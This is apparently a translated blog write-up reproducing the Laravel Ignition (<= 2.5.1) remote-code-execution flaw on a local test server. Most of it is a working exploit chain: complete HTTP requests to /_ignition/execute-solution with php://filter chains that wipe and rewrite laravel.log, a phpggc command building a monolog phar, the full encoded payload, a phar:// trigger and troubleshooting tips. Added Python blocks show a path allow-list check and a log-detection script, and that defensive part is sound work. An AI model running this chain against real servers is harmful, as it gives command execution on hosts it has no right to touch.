LARAVEL


LARAVEL <= v8.4.2 RCE Reproduction

Saw in the team chat that a Laravel vulnerability had dropped, so I figured I'd reproduce it.
Reference: https://www.ambionics.io/blog/laravel-debug-rce

Environment setup

Download the 8.4.0 framework from GitHub
Install the dependencies with composer
Enable debug mode
php serve and you're good to go

Vulnerability analysis

The core issue is in Ignition (<= 2.5.1), in

./vendor/facade/ignition/src/Solutions/MakeViewVariableOptionalSolution.php

This "solution" lets a developer click a button to quickly fix certain errors. There is basically no filtering here, so the viewFile parameter is fully controllable by the requester, and since it is handed straight to file_get_contents and file_put_contents, we can reach PHP stream wrappers through it.

image-20210114101815100

That gives us a way to trigger phar.
And because Laravel writes errors to the log by default, our payload has a file on disk to land in, so the plan is clear:
write a crafted payload into the log, trigger phar deserialization, and get RCE.
Since Laravel's logging is built on monolog,
this part can follow the monolog/rce1 chain from phpggc.
In debug mode this function is used to auto-fix the failing route and write the result to the file;
capturing a request shows it:

POST /_ignition/execute-solution HTTP/1.1
Host: 127.0.0.1:8000
Content-Length: 196
Accept: application/json
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36
Content-Type: application/json
Origin: http://127.0.0.1:8000
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:8000/ha1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,mg;q=0.7
Cookie: XSRF-TOKEN=eyJpdiI6IkhRbWN1Uk0rSTU5aDJTZmkrTENENmc9PSIsInZhbHVlIjoiRzNId29jZVVTL1ByYmVxREdjUWgrL2VERU4zMXYwS3lFdExGS3NpTEcwc2h1SklKcDRYSk9DWVRvOW5qZUVlbzNEVVJ1czF6NWVETHBXVlMzNXVwZlROMkYwUHZ1ajgyTG1zdVVHVWVZNGhVZit0dFp1VkJiV2pYVWJROHVTNlciLCJtYWMiOiJmOTFiYjFiZjA0MTI2OWMzZTZhYjIwYWI4YzUxMzIxMjA3YjhkZDdhODVjNzQ1ZWJlZjEwOTRmZjgyOGIwZDYxIn0%3D; laravel_session=eyJpdiI6IlNlYktMUXBKWmp3V0lzQ2tWMEhFUUE9PSIsInZhbHVlIjoiM3crMXdqNk1qaFc2eXZwOXVXRW03bGlCNnZRSTBQbFMwcW5WbmtTMmRKYXhwMmRtdnhZZDl2b0ZiUkx5R1BLbWl1azdTN0NFVElUNFprb2QyaHphNVQ4ZDZxU09QSVBVbnpVOHNEdDduaHZUVVk1cWlwTDJTeHRNL3h5ZkJTOGEiLCJtYWMiOiI2MjIzOTc1NTgwMmUxMzU1NjlmMWQyNGYyYjliNDRjNmIyYmM5ZjliODBhZDgzY2Q5ZDk5NGQwNjUxMjRmZTk1In0%3D
Connection: close
{"solution":"Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution","parameters":{"variableName":"usesname","viewFile":"/Applications/MAMP/htdocs/laravel/resources/views/hello.blade.php"}}

Since the value is completely controllable here, stream wrappers can be used.
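For contrast, here is the kind of allow-list check this endpoint is missing. This is an added Python example, not Ignition's code and not the actual upstream patch; the views directory, the log file and the file names are constructed stand-ins for the MAMP paths in the capture above.

```python
import os
import re
import tempfile

# A scheme prefix of two or more characters followed by ':' (php://, phar://,
# data:, compress.zlib://). Real template paths never carry one.
SCHEME_RE = re.compile(r"^[A-Za-z][A-Za-z0-9+.\-]+:")


def is_safe_view_file(view_file: str, views_root: str) -> bool:
    """Allow-list check for a user-supplied template path.

    Accepts only an existing '*.blade.php' file that resolves to a location
    inside views_root. Stream wrappers, NUL bytes and '..' traversal are all
    rejected before the value reaches any file read or write.
    """
    if not view_file or "\x00" in view_file:
        return False
    if SCHEME_RE.match(view_file):
        return False  # php://filter, phar://, data: ... are never templates
    root = os.path.realpath(views_root)
    candidate = view_file if os.path.isabs(view_file) else os.path.join(root, view_file)
    target = os.path.realpath(candidate)
    # realpath has collapsed any '..'; now insist the result is still under root.
    if os.path.commonpath([root, target]) != root:
        return False
    if not target.endswith(".blade.php"):
        return False
    return os.path.isfile(target)


def demo() -> dict:
    """Constructed fixture: a throwaway app tree standing in for the
    /Applications/MAMP/htdocs/laravel tree used in the post."""
    base = os.path.realpath(tempfile.mkdtemp())
    views = os.path.join(base, "resources", "views")
    os.makedirs(views)
    with open(os.path.join(views, "hello.blade.php"), "w") as fh:
        fh.write("<h1>{{ $usesname }}</h1>\n")
    log = os.path.join(base, "storage", "logs", "laravel.log")
    os.makedirs(os.path.dirname(log))
    open(log, "w").close()
    return {
        # the legitimate viewFile from the captured request
        "legit_view": is_safe_view_file(os.path.join(views, "hello.blade.php"), views),
        "relative_view": is_safe_view_file("hello.blade.php", views),
        # wrapper-based values of the kind used against the endpoint
        "php_filter": is_safe_view_file(
            "php://filter/write=convert.base64-decode/resource=" + log, views),
        "phar_wrapper": is_safe_view_file("phar://" + log, views),
        # plain traversal out of the views directory
        "traversal_to_log": is_safe_view_file("../../storage/logs/laravel.log", views),
        # right directory, wrong extension
        "not_a_template": is_safe_view_file(os.path.join(views, "..", "views", "x.txt"), views),
    }


if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name:18s} {'allowed' if ok else 'rejected'}")
```

The order of the checks matters: the scheme test runs before realpath, because realpath itself would already open the path through the wrapper in PHP's case, and the containment test compares resolved paths rather than string prefixes so that a sibling directory with a similar name is not accepted.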

Reproduction

Step 1: clear the log

POST /_ignition/execute-solution HTTP/1.1
Host: 127.0.0.1:8000
Content-Length: 330
Accept: application/json
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36
Content-Type: application/json
Origin: http://127.0.0.1:8000
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:8000/ha1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,mg;q=0.7
Cookie: XSRF-TOKEN=eyJpdiI6Ii8zV2RsZkt3UGRYcEVwSmgzVzFtRGc9PSIsInZhbHVlIjoiR2J1NmQweUZkSzY5TWczVWg4RFVVWi95WHEwTStMTGp1VXZINkRPODZ4MTl1eEtoc2pNVmJvak84R3ZRL3diSmNWT0NoZ1RhQzdlUmFReDJWZTF2TlZ6RU5SaURCOXRwS25NbGRqOEVLS1BUdHJZNFova2I4UktQOGhHOGVSRnciLCJtYWMiOiI2ZDhhNDYwYzMxYWZlNjkzZWE5N2YwNmJjZGQ4NTQwZmY0YWNhY2Y1NzBkNTlkNTdkMGU5YjU0MWUxZDJmNTRjIn0%3D; laravel_session=eyJpdiI6IjlTbjlhYkxjVDhZM1VGZk13U01mbWc9PSIsInZhbHVlIjoiaFEzMzA5cWEyM0E5ek02WXNBM3RSeGNoYUJuN1dueHRiVjNWNG1peUZWYWZzNFFoL2hpYU94Z0VYY0h1Tk1MNTlMbytQdnQvK3piKzgxZ2FERnBZenZBMTEvVDQrNXhkN21vRi9aa0RVVWd2b3RQaW5BbEx5VXc5TjJ4ZzM2R2wiLCJtYWMiOiJhOWQwZmFmOGE3ZDY4MzY3ZDJiZWMwYzlkYjk0M2M0ZDM3MmQ2MzU4YTdkNTU3MjlkZmM1MGI2MjIzYTAwZGUwIn0%3D
Connection: close
{"solution":"Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution","parameters":{  "variableName":"usesname","viewFile":"php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=/Applications/MAMP/htdocs/laravel/storage/logs/laravel.log"}}

Step 2: generate and write the payload

First, generate it:

php -d'phar.readonly=0' ./phpggc monolog/rce1 system id --phar phar -o php://output | base64 -w0 | sed -E 's/./\0=00/g'

 

image-20210114202108801

Then write it into the log:

POST /_ignition/execute-solution HTTP/1.1
Host: 127.0.0.1:8000
Content-Length: 6302
Accept: application/json
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36
Content-Type: application/json
Origin: http://127.0.0.1:8000
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:8000/ha1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,mg;q=0.7
Cookie: XSRF-TOKEN=eyJpdiI6IkhRbWN1Uk0rSTU5aDJTZmkrTENENmc9PSIsInZhbHVlIjoiRzNId29jZVVTL1ByYmVxREdjUWgrL2VERU4zMXYwS3lFdExGS3NpTEcwc2h1SklKcDRYSk9DWVRvOW5qZUVlbzNEVVJ1czF6NWVETHBXVlMzNXVwZlROMkYwUHZ1ajgyTG1zdVVHVWVZNGhVZit0dFp1VkJiV2pYVWJROHVTNlciLCJtYWMiOiJmOTFiYjFiZjA0MTI2OWMzZTZhYjIwYWI4YzUxMzIxMjA3YjhkZDdhODVjNzQ1ZWJlZjEwOTRmZjgyOGIwZDYxIn0%3D; laravel_session=eyJpdiI6IlNlYktMUXBKWmp3V0lzQ2tWMEhFUUE9PSIsInZhbHVlIjoiM3crMXdqNk1qaFc2eXZwOXVXRW03bGlCNnZRSTBQbFMwcW5WbmtTMmRKYXhwMmRtdnhZZDl2b0ZiUkx5R1BLbWl1azdTN0NFVElUNFprb2QyaHphNVQ4ZDZxU09QSVBVbnpVOHNEdDduaHZUVVk1cWlwTDJTeHRNL3h5ZkJTOGEiLCJtYWMiOiI2MjIzOTc1NTgwMmUxMzU1NjlmMWQyNGYyYjliNDRjNmIyYmM5ZjliODBhZDgzY2Q5ZDk5NGQwNjUxMjRmZTk1In0%3D
Connection: close
{"solution":"Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution","parameters":{"variableName":"usesname","viewFile":"...=50=00=44=00=39=00=77=00=61=00=48=00=41=00=67=00=58=00=31=00=39=00=49=00=51=00=55=00=78=00=55=00=58=00=30=00=4E=00=50=00=54=00=56=00=42=00=4A=00=54=00=45=00=56=00=53=00=4B=00=43=00=6B=00=37=00=49=00=44=00=38=00=2B=00=44=00=51=00=71=00=39=00=41=00=67=00=41=00=41=00=41=00=67=00=41=00=41=00=41=00=42=00=45=00=41=00=41=00=41=00=41=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=42=00=6D=00=41=00=67=00=41=00=41=00=54=00=7A=00=6F=00=7A=00=4D=00=6A=00=6F=00=69=00=54=00=57=00=39=00=75=00=62=00=32=00=78=00=76=00=5A=00=31=00=78=00=49=00=59=00=57=00=35=00=6B=00=62=00=47=00=56=00=79=00=58=00=46=00=4E=00=35=00=63=00=32=00=78=00=76=00=5A=00=31=00=56=00=6B=00=63=00=45=00=68=00=68=00=62=00=6D=00=52=00=73=00=5A=00=58=00=49=00=69=00=4F=00=6A=00=45=00=36=00=65=00=33=00=4D=00=36=00=4F=00=54=00=6F=00=69=00=41=00=43=00=6F=00=41=00=63=00=32=00=39=00=6A=00=61=00=32=00=56=00=30=00=49=00=6A=00=74=00=50=00=4F=00=6A=00=49=00=35=00=4F=00=69=00=4A=00=4E=00=62=00=32=00=35=00=76=00=62=00=47=00=39=00=6E=00=58=00=45=00=68=00=68=00=62=00=6D=00=52=00=73=00=5A=00=58=00=4A=00=63=00=51=00=6E=00=56=00=6D=00=5A=00=6D=00=56=00=79=00=53=00=47=00=46=00=75=00=5A=00=47=00=78=00=6C=00=63=00=69=00=49=00=36=00=4E=00=7A=00=70=00=37=00=63=00=7A=00=6F=00=78=00=4D=00=44=00=6F=00=69=00=41=00=43=00=6F=00=41=00=61=00=47=00=46=00=75=00=5A=00=47=00=78=00=6C=00=63=00=69=00=49=00=37=00=54=00=7A=00=6F=00=79=00=4F=00=54=00=6F=00=69=00=54=00=57=00=39=00=75=00=62=00=32=00=78=00=76=00=5A=00=31=00=78=00=49=00=59=00=57=00=35=00=6B=00=62=00=47=00=56=00=79=00=58=00=45=00=4A=00=31=00=5A=00=6D=00=5A=00=6C=00=63=00=6B=00=68=00=68=00=62=00=6D=00=52=00=73=00=5A=00=58=00=49=00=69=00=4F=00=6A=00=63=00=36=00=65=00=33=00=4D=00=36=00=4D=00=54=00=41=00=36=00=49=00=67=00=41=00=71=00=41=00=47=00=68=00=68=00=62=00=6D=00=52=00=73=00=5A=00=58=00=49=00=69=00=4F=00=30=00=34=00=37=00=63=00=7A=00=6F=00=78=00=4D=00=7A=00=6F=00=69
=00=41=00=43=00=6F=00=41=00=59=00=6E=00=56=00=6D=00=5A=00=6D=00=56=00=79=00=55=00=32=00=6C=00=36=00=5A=00=53=00=49=00=37=00=61=00=54=00=6F=00=74=00=4D=00=54=00=74=00=7A=00=4F=00=6A=00=6B=00=36=00=49=00=67=00=41=00=71=00=41=00=47=00=4A=00=31=00=5A=00=6D=00=5A=00=6C=00=63=00=69=00=49=00=37=00=59=00=54=00=6F=00=78=00=4F=00=6E=00=74=00=70=00=4F=00=6A=00=41=00=37=00=59=00=54=00=6F=00=79=00=4F=00=6E=00=74=00=70=00=4F=00=6A=00=41=00=37=00=63=00=7A=00=6F=00=79=00=4F=00=69=00=4A=00=73=00=63=00=79=00=49=00=37=00=63=00=7A=00=6F=00=31=00=4F=00=69=00=4A=00=73=00=5A=00=58=00=5A=00=6C=00=62=00=43=00=49=00=37=00=54=00=6A=00=74=00=39=00=66=00=58=00=4D=00=36=00=4F=00=44=00=6F=00=69=00=41=00=43=00=6F=00=41=00=62=00=47=00=56=00=32=00=5A=00=57=00=77=00=69=00=4F=00=30=00=34=00=37=00=63=00=7A=00=6F=00=78=00=4E=00=44=00=6F=00=69=00=41=00=43=00=6F=00=41=00=61=00=57=00=35=00=70=00=64=00=47=00=6C=00=68=00=62=00=47=00=6C=00=36=00=5A=00=57=00=51=00=69=00=4F=00=32=00=49=00=36=00=4D=00=54=00=74=00=7A=00=4F=00=6A=00=45=00=30=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=69=00=64=00=57=00=5A=00=6D=00=5A=00=58=00=4A=00=4D=00=61=00=57=00=31=00=70=00=64=00=43=00=49=00=37=00=61=00=54=00=6F=00=74=00=4D=00=54=00=74=00=7A=00=4F=00=6A=00=45=00=7A=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=77=00=63=00=6D=00=39=00=6A=00=5A=00=58=00=4E=00=7A=00=62=00=33=00=4A=00=7A=00=49=00=6A=00=74=00=68=00=4F=00=6A=00=49=00=36=00=65=00=32=00=6B=00=36=00=4D=00=44=00=74=00=7A=00=4F=00=6A=00=63=00=36=00=49=00=6D=00=4E=00=31=00=63=00=6E=00=4A=00=6C=00=62=00=6E=00=51=00=69=00=4F=00=32=00=6B=00=36=00=4D=00=54=00=74=00=7A=00=4F=00=6A=00=59=00=36=00=49=00=6E=00=4E=00=35=00=63=00=33=00=52=00=6C=00=62=00=53=00=49=00=37=00=66=00=58=00=31=00=7A=00=4F=00=6A=00=45=00=7A=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=69=00=64=00=57=00=5A=00=6D=00=5A=00=58=00=4A=00=54=00=61=00=58=00=70=00=6C=00=49=00=6A=00=74=00=70=00=4F=00=69=00=30=00=78=00=4F=00=33=00=4D=00=36=00=4F=00=54=00=6F=00=69=00=41=00=43=00=6F=00=41=00=59=00=6E=00=56=00=6D=00=5A=0
0=6D=00=56=00=79=00=49=00=6A=00=74=00=68=00=4F=00=6A=00=45=00=36=00=65=00=32=00=6B=00=36=00=4D=00=44=00=74=00=68=00=4F=00=6A=00=49=00=36=00=65=00=32=00=6B=00=36=00=4D=00=44=00=74=00=7A=00=4F=00=6A=00=49=00=36=00=49=00=6D=00=78=00=7A=00=49=00=6A=00=74=00=7A=00=4F=00=6A=00=55=00=36=00=49=00=6D=00=78=00=6C=00=64=00=6D=00=56=00=73=00=49=00=6A=00=74=00=4F=00=4F=00=33=00=31=00=39=00=63=00=7A=00=6F=00=34=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=73=00=5A=00=58=00=5A=00=6C=00=62=00=43=00=49=00=37=00=54=00=6A=00=74=00=7A=00=4F=00=6A=00=45=00=30=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=70=00=62=00=6D=00=6C=00=30=00=61=00=57=00=46=00=73=00=61=00=58=00=70=00=6C=00=5A=00=43=00=49=00=37=00=59=00=6A=00=6F=00=78=00=4F=00=33=00=4D=00=36=00=4D=00=54=00=51=00=36=00=49=00=67=00=41=00=71=00=41=00=47=00=4A=00=31=00=5A=00=6D=00=5A=00=6C=00=63=00=6B=00=78=00=70=00=62=00=57=00=6C=00=30=00=49=00=6A=00=74=00=70=00=4F=00=69=00=30=00=78=00=4F=00=33=00=4D=00=36=00=4D=00=54=00=4D=00=36=00=49=00=67=00=41=00=71=00=41=00=48=00=42=00=79=00=62=00=32=00=4E=00=6C=00=63=00=33=00=4E=00=76=00=63=00=6E=00=4D=00=69=00=4F=00=32=00=45=00=36=00=4D=00=6A=00=70=00=37=00=61=00=54=00=6F=00=77=00=4F=00=33=00=4D=00=36=00=4E=00=7A=00=6F=00=69=00=59=00=33=00=56=00=79=00=63=00=6D=00=56=00=75=00=64=00=43=00=49=00=37=00=61=00=54=00=6F=00=78=00=4F=00=33=00=4D=00=36=00=4E=00=6A=00=6F=00=69=00=63=00=33=00=6C=00=7A=00=64=00=47=00=56=00=74=00=49=00=6A=00=74=00=39=00=66=00=58=00=30=00=46=00=41=00=41=00=41=00=41=00=5A=00=48=00=56=00=74=00=62=00=58=00=6B=00=45=00=41=00=41=00=41=00=41=00=76=00=79=00=34=00=41=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=49=00=41=00=41=00=41=00=41=00=64=00=47=00=56=00=7A=00=64=00=43=00=35=00=30=00=65=00=48=00=51=00=45=00=41=00=41=00=41=00=41=00=76=00=79=00=34=00=41=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=
42=00=30=00=5A=00=58=00=4E=00=30=00=64=00=47=00=56=00=7A=00=64=00=45=00=33=00=52=00=45=00=4C=00=74=00=4D=00=43=00=48=00=2F=00=4D=00=6B=00=76=00=43=00=42=00=6F=00=53=00=39=00=41=00=6C=00=52=00=35=00=72=00=76=00=4C=00=76=00=73=00=41=00=67=00=41=00=41=00=41=00=45=00=64=00=43=00=54=00=55=00=49=00=3D=00"}}

Step 3: trigger phar generation

POST /_ignition/execute-solution HTTP/1.1
Host: 127.0.0.1:8000
Content-Length: 300
Accept: application/json
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36
Content-Type: application/json
Origin: http://127.0.0.1:8000
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:8000/ha1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,mg;q=0.7
Cookie: XSRF-TOKEN=eyJpdiI6Ii8zV2RsZkt3UGRYcEVwSmgzVzFtRGc9PSIsInZhbHVlIjoiR2J1NmQweUZkSzY5TWczVWg4RFVVWi95WHEwTStMTGp1VXZINkRPODZ4MTl1eEtoc2pNVmJvak84R3ZRL3diSmNWT0NoZ1RhQzdlUmFReDJWZTF2TlZ6RU5SaURCOXRwS25NbGRqOEVLS1BUdHJZNFova2I4UktQOGhHOGVSRnciLCJtYWMiOiI2ZDhhNDYwYzMxYWZlNjkzZWE5N2YwNmJjZGQ4NTQwZmY0YWNhY2Y1NzBkNTlkNTdkMGU5YjU0MWUxZDJmNTRjIn0%3D; laravel_session=eyJpdiI6IjlTbjlhYkxjVDhZM1VGZk13U01mbWc9PSIsInZhbHVlIjoiaFEzMzA5cWEyM0E5ek02WXNBM3RSeGNoYUJuN1dueHRiVjNWNG1peUZWYWZzNFFoL2hpYU94Z0VYY0h1Tk1MNTlMbytQdnQvK3piKzgxZ2FERnBZenZBMTEvVDQrNXhkN21vRi9aa0RVVWd2b3RQaW5BbEx5VXc5TjJ4ZzM2R2wiLCJtYWMiOiJhOWQwZmFmOGE3ZDY4MzY3ZDJiZWMwYzlkYjk0M2M0ZDM3MmQ2MzU4YTdkNTU3MjlkZmM1MGI2MjIzYTAwZGUwIn0%3D
Connection: close
{"solution":"Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution","parameters":{"variableName":"usesname","viewFile":"php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=/Applications/MAMP/htdocs/laravel/storage/logs/laravel.log"}}

Step 4: trigger the phar

POST /_ignition/execute-solution HTTP/1.1
Host: 127.0.0.1:8000
Content-Length: 197
Accept: application/json
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36
Content-Type: application/json
Origin: http://127.0.0.1:8000
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:8000/ha1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,mg;q=0.7
Cookie: XSRF-TOKEN=eyJpdiI6Ii8zV2RsZkt3UGRYcEVwSmgzVzFtRGc9PSIsInZhbHVlIjoiR2J1NmQweUZkSzY5TWczVWg4RFVVWi95WHEwTStMTGp1VXZINkRPODZ4MTl1eEtoc2pNVmJvak84R3ZRL3diSmNWT0NoZ1RhQzdlUmFReDJWZTF2TlZ6RU5SaURCOXRwS25NbGRqOEVLS1BUdHJZNFova2I4UktQOGhHOGVSRnciLCJtYWMiOiI2ZDhhNDYwYzMxYWZlNjkzZWE5N2YwNmJjZGQ4NTQwZmY0YWNhY2Y1NzBkNTlkNTdkMGU5YjU0MWUxZDJmNTRjIn0%3D; laravel_session=eyJpdiI6IjlTbjlhYkxjVDhZM1VGZk13U01mbWc9PSIsInZhbHVlIjoiaFEzMzA5cWEyM0E5ek02WXNBM3RSeGNoYUJuN1dueHRiVjNWNG1peUZWYWZzNFFoL2hpYU94Z0VYY0h1Tk1MNTlMbytQdnQvK3piKzgxZ2FERnBZenZBMTEvVDQrNXhkN21vRi9aa0RVVWd2b3RQaW5BbEx5VXc5TjJ4ZzM2R2wiLCJtYWMiOiJhOWQwZmFmOGE3ZDY4MzY3ZDJiZWMwYzlkYjk0M2M0ZDM3MmQ2MzU4YTdkNTU3MjlkZmM1MGI2MjIzYTAwZGUwIn0%3D
Connection: close
{"solution":"Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution","parameters":{  "variableName":"usesname","viewFile":"phar:///Applications/MAMP/htdocs/laravel/storage/logs/laravel.log"}}

image-20210114195550142
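From the detection side, the four requests above share a shape that is easy to match in access or WAF logs: a POST to /_ignition/execute-solution whose MakeViewVariableOptionalSolution body carries a viewFile with a stream wrapper, a convert.* filter chain, a path under storage/logs, or an oversized value. The script below is an added Python example (not from the post, not a vendor tool) that runs such rules over constructed request records modelled on the captures; the timestamps and source addresses are made up, and the bodies reuse the paths from the post.

```python
import json

IGNITION_EXECUTE = "/_ignition/execute-solution"
TARGET_SOLUTION = "MakeViewVariableOptionalSolution"
APP = "/Applications/MAMP/htdocs/laravel"  # path from the post, constructed records

import re

# Stream wrappers that have no business in a template path.
WRAPPER_RE = re.compile(r"^\s*(php|phar|data|glob|compress\.[a-z0-9]+)://?", re.I)
# Filter chains of the kind used to rewrite the log file.
FILTER_RE = re.compile(r"convert\.(base64-decode|quoted-printable-(?:en|de)code|iconv\.)", re.I)


def classify(rec: dict) -> list:
    """Return the reasons a request record looks like abuse of the Ignition
    solution endpoint; an empty list means nothing stood out."""
    if rec.get("method") != "POST" or rec.get("path") != IGNITION_EXECUTE:
        return []
    try:
        body = json.loads(rec.get("body") or "")
    except ValueError:
        return ["unparseable_body"]
    if not isinstance(body, dict):
        return ["unparseable_body"]
    solution = str(body.get("solution", ""))
    params = body.get("parameters") or {}
    view_file = str(params.get("viewFile", ""))
    reasons = []
    if not solution.endswith(TARGET_SOLUTION):
        return reasons
    if WRAPPER_RE.match(view_file):
        reasons.append("viewFile_stream_wrapper")
    if FILTER_RE.search(view_file):
        reasons.append("viewFile_filter_chain")
    if view_file.endswith(".log") or "/storage/logs/" in view_file:
        reasons.append("viewFile_targets_log")
    if len(view_file) > 1024:
        reasons.append("viewFile_oversized")
    return reasons


def scan(records: list) -> list:
    """Run classify() over a batch and keep only the flagged entries."""
    flagged = []
    for rec in records:
        reasons = classify(rec)
        if reasons:
            flagged.append((rec["ts"], reasons))
    return flagged


def _ignition_body(view_file: str) -> str:
    return json.dumps({
        "solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",
        "parameters": {"variableName": "usesname", "viewFile": view_file},
    })


# Constructed records: one benign page hit, one legitimate solution run, then
# the shapes of the four reproduction steps in the order the post shows them.
SAMPLE_REQUESTS = [
    {"ts": "2021-01-14T10:10:01", "src": "127.0.0.1", "method": "GET",
     "path": "/ha1", "body": ""},
    {"ts": "2021-01-14T10:18:15", "src": "127.0.0.1", "method": "POST",
     "path": IGNITION_EXECUTE,
     "body": _ignition_body(APP + "/resources/views/hello.blade.php")},
    {"ts": "2021-01-14T19:40:02", "src": "127.0.0.1", "method": "POST",
     "path": IGNITION_EXECUTE,
     "body": _ignition_body(
         "php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode"
         "|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource="
         + APP + "/storage/logs/laravel.log")},
    {"ts": "2021-01-14T19:41:10", "src": "127.0.0.1", "method": "POST",
     "path": IGNITION_EXECUTE,
     "body": _ignition_body("..." + "=50=00" * 300)},  # stand-in for the long QP blob
    {"ts": "2021-01-14T19:42:30", "src": "127.0.0.1", "method": "POST",
     "path": IGNITION_EXECUTE,
     "body": _ignition_body(
         "php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8"
         "|convert.base64-decode/resource=" + APP + "/storage/logs/laravel.log")},
    {"ts": "2021-01-14T19:55:50", "src": "127.0.0.1", "method": "POST",
     "path": IGNITION_EXECUTE,
     "body": _ignition_body("phar://" + APP + "/storage/logs/laravel.log")},
]

if __name__ == "__main__":
    for ts, reasons in scan(SAMPLE_REQUESTS):
        print(ts, ", ".join(reasons))
```

On a production host the rules can be far simpler: the endpoint only exists while APP_DEBUG is on, so any request at all to a path under /_ignition/ is a configuration finding before the body is even looked at. The content rules above are for development and staging hosts where the endpoint is expected to answer.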

Some details

1. Clearing the log

Tested locally: the payload can actually be written in without clearing first; clearing is presumably to keep the generated phar under 100M, since a larger one would not trigger.
The original author used

php://filter/write=convert.base64-decode|convert.base64-decode|convert.base64-decode/resource=/path/to/storage/logs/laravel.log

to clear the log. The principle is that the convert.base64-decode filter strips characters that are not valid base64 before decoding, so applying it several times empties the log.

image-20210114201735961

Roughly that's the idea.
Another approach found online:

php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log

This uses convert.iconv.utf-16be.utf-8 to first turn the text into characters that are not valid base64, then uses convert.base64-decode to clear it; the principle is basically the same, so I won't go into it further.

2. Payload generation

The original author's payload generation had a problem: locally, apart from triggering id, it did nothing at all.
This one works much better:

php -d'phar.readonly=0' ./phpggc monolog/rce1 system ls --phar phar -o php://output | base64 -w0

Then:

>>> import base64
>>> s = 'payload'
>>> ''.join(["=" + hex(ord(i))[2:] + "=00" for i in s]).upper()

3. Generating the phar

During reproduction this error comes up a lot:

file_put_contents(): stream filter (convert.quoted-printable-decode): invalid byte sequence

image-20210114202922000

Looked it up: it's related to convert.quoted-printable-decode, which requires an even length, so just prepend a few dots to the payload to pad it.

image-20210114203013426

After that the response should come back 200 and the phar is generated.

On my side it comes out to 770 bytes by default; anything around that size should work.

Closing

If anything in here is wrong, please point it out; my explanations may still be lacking in places, sob.

Note:

Best to generate on Linux; generating on Mac had some issue that cost me a whole day.
 
